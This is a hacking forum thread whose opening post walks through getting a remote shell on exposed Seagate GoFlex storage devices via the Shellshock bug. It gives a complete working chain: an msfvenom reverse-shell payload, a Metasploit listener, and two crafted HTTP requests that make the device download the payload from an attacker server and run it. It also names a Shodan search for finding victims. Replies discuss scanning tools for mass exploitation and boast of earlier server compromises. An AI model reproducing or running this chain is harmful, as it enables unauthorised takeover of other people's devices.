Getting a remote shell on any one of 68,000+ Seagate GoFlex devices

[AnarchyAngel]

I have been scanning some ranges in my free time and came across a Seagate GoFlex Home Network Storage System which my scanner flagged as being vulnerable to shellshock but getting a remote shell was no easy task "for me anyway". I ended up having to build a payload with msfvenom and doing the execution using burp suite and handling the shell with metasploit handler. The best part is this device uses UPNP to tunnel to the Internet, giving us easy access >

Start with the payload:

Code: [Select]

msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txt
Now upload msf.txt to your web server. After the payload is uploaded open metasploit and

Code: [Select]

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
run
That should start up our listener. Now we need to open up burp and use the repeater. Enter the following for the request:

Code: [Select]

GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://1.2.3.4/msf.txt -O /tmp/msf.php2>&1;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Also don't forget to configure the target correctly. Hit go and wait a few seconds and you should see some wget output and if all went well you should now have uploaded msf.php to the /tmp/ dir of the device. Now we just need to execute it. For this we use burp again. This time put this in the request:

Code: [Select]

GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
This time when you hit Go, and your ports are forwarded correctly, you should be able to go back to our msfconsole window and see a session has opened.  You wont have root at this point but you can still do a lot of fun stuff. You can find some of these devices on Shodan by searching for "hipname=". If anyone figures out how to get root please share Enjoy!

*Count of vulnerable devices taken from Shodan search results, not actual testing.
**I did not test it but you could try to use linux/x86/exec payload in bash bug exploit module to deploy and execute. This would allow you to keep it all in metasploit.

Original post - http://aahideaway.blogspot.com/2015/11/getting-remote-shell-on-any-one-of.html
Check it out for more information on this and other posts.

[Ragnar]

Hey, great project. You talked about a "scanner". Can you explain it more? What kind of scanner do you have?

I have been scanning some ranges in my free time and came across a Seagate GoFlex Home Network Storage System which my scanner flagged as being vulnerable to shellshock but getting a remote shell was no easy task "for me anyway".

[Dr4g0n]

Hey, great project. You talked about a "scanner". Can you explain it more? What kind of scanner do you have?

My guess would be, if he is scanning across the internet, it's either masscan or nmap, those are the two that would either be the most popular or be the fastest to scan for mass exploitation.

[AnarchyAngel]

My guess would be, if he is scanning across the internet, it's either masscan or nmap, those are the two that would either be the most popular or be the fastest to scan for mass exploitation.

good guess, but i was using openvas because it was a smaller scope "the ranges i was scanning" and i like its reporting.

[Dr4g0n]

good guess, but i was using openvas because it was a smaller scope "the ranges i was scanning" and i like its reporting.

Ah, I've never heard of that tool, wish it was open source.

[m0rph]

You know, I seem to remember rooting a hosting server on a Russian ISP called ROPNet a couple of years back, and sitting on it for a few months when all of a sudden it was owned at a lower level by a perl bot written by a group called Angels of Anarchy or Anarchy Angels...something like that. They were American and most of them from Wisconsin. I don't suppose you would know anything about that would you OP?

[AnarchyAngel]

Ah, I've never heard of that tool, wish it was open source.

it is open source. - http://www.openvas.org/

[AnarchyAngel]

You know, I seem to remember rooting a hosting server on a Russian ISP called ROPNet a couple of years back, and sitting on it for a few months when all of a sudden it was owned at a lower level by a perl bot written by a group called Angels of Anarchy or Anarchy Angels...something like that. They were American and most of them from Wisconsin. I don't suppose you would know anything about that would you OP?

maybe, maybe not. 

[Dr4g0n]

it is open source. - http://www.openvas.org/

Fucking google-fu was weak today, lol, thanks.

[AnarchyAngel]

Fucking google-fu was weak today, lol, thanks.

no problem